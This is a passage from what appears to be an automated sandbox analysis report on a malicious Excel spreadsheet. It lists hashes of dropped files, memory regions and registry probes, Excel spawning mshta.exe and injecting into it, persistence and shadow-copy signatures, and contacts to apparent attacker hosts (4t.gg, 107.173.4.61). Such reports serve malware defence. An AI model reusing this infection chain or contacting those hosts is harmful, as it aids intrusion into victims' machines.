SHA256 c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab
SHA512 c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d

C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp

MD5 ceff02079ffeba9fe9071e2a8dc5c60b
SHA1 8ef32fde3068d74ff260594f4e81a9e722dd9c8a
SHA256 f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d
SHA512 8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74

C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll

MD5 1a216f7b4404a7e76e9224ad3f4d0579
SHA1 97954f49e9a8c8b54c1542a8f916972443e5b389
SHA256 e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02
SHA512 45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4

C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb

MD5 7b95801062f5d47de9cc5e59dcc10462
SHA1 6d7e58750a67f796d6441a84538f32b0d481a95e
SHA256 1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009
SHA512 e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d

memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\wlanext.exe

MD5 7423e3013a2ca93513e9f1024dfe1cc8
SHA1 525281537f75c168ca4015df438bb83a7784931a
SHA256 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df
SHA512 d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0

C:\Users\Admin\AppData\Local\Temp\juvenilely

MD5 5fc0e7bec89d9a4e021d88dd1cf731b2
SHA1 26ea02938cb1eb51a1ac601ab1b068a130cc3719
SHA256 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d
SHA512 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f

memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp

memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip

MD5 3bcbd3b08e4a8843fda34512623960a2
SHA1 244d3df69bbc09a43d4af3de5165f50506b8d7af
SHA256 7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c
SHA512 914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639

\Users\Admin\AppData\Local\Temp\sqlite3.dll

MD5 dda1b03a5cd2ca37c96b7daf5e3a8ed7
SHA1 c70e5f58e61980d39608f0795879bf012dbbbca2
SHA256 79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d
SHA512 bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f

memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp

memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-13 02:46
Reported: 2024-11-13 02:48
Platform: win10v2004-20241007-en
Max time kernel: 144s
Max time network: 137s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3092 wrote to memory of 856 (2 events) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 4t.gg | udp
KR | 221.146.204.133:443 | 4t.gg | tcp
US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp
US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | r10.o.lencr.org | udp
GB | 2.23.210.82:80 | r10.o.lencr.org | tcp
US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp
US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp
US | 107.173.4.61:80 | 107.173.4.61 | tcp
US | 8.8.8.8:53 | 61.4.173.107.in-addr.arpa | udp
US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp

Files

memory/3092-1-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

memory/3092-3-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-2-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-0-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-4-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-5-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-7-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-6-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-8-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp

memory/3092-9-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-10-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

memory/3092-11-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-12-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-13-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp

memory/3092-18-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-17-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-16-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-14-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-15-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-38-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-39-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-41-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-43-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-45-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-47-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/3092-46-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp

memory/3092-48-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-52-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp

memory/856-53-0x00007FF69FFD0000-0x00007FF69FFD8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 33ed741e738ffd17972791590e87aa49
SHA1 e9b716cc084e27b359ecf84a8e747c1e6d2d99a6
SHA256 6a4cc7e2807e9a9891c9bda562deef9f9cdca2b8a043c0b9307013e729601156
SHA512 84c0e5fac4ab95a78aa2d929c6be519f8f683b64cd13920d59a31ffff09350f0fbf25cd54544e87bb112b503f3bc7222379ccd4748096eaf8fc8aa91df779126